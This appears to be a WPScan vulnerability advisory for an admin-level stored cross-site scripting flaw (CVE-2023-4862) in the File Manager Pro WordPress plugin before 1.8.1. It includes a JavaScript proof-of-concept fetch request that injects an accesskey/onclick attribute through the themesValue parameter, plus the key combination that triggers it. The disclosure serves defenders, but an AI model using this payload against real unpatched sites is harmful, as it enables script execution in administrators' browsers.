WordPress Plugin Vulnerabilities

File Manager Pro < 1.8.1 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not adequately validate and escape some inputs, leading to XSS by high-privilege users.

Proof of Concept

As an admin, open the File Manager and run the following JS code:

fetch("http://localhost:10008/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=selector_themes&themesValue=dark-slim\"+accesskey=X+onclick=alert(/XSS/)+\"&nonce=" + wpData.nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

As a super-admin, open the File Manager and press the Access Key combination (Firefox for Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X) to trigger the XSS.

Affects Plugins

Plugin icon
filester
Fixed in 1.8.1

References

CVE
CVE-2023-4862

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.5 (low)

Miscellaneous

Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
81821bf5-69e1-4005-b3eb-d541490909cc

Timeline

Publicly Published
2023-09-19 (about 7 months ago)
Added
2023-09-19 (about 7 months ago)
Last Updated
2023-09-19 (about 7 months ago)

Other

Published
Title
Published
2014-08-01
Title
Multiple Themes - PrettyPhoto DOM XSS
Published
2021-10-14
Title
Job Manager <= 0.7.25 - Admin+ Stored Cross-Site Scripting
Published
2014-12-05
Title
Shariff for WordPress <= 1.0.7 - Stored Cross-Site Scripting (XSS)
Published
2014-08-01
Title
Live Comment Preview 2.0.2 - Comment Field Preview XSS
Published
2024-04-30
Title
RegistrationMagic < 5.3.2.1 - Reflected Cross-Site Scripting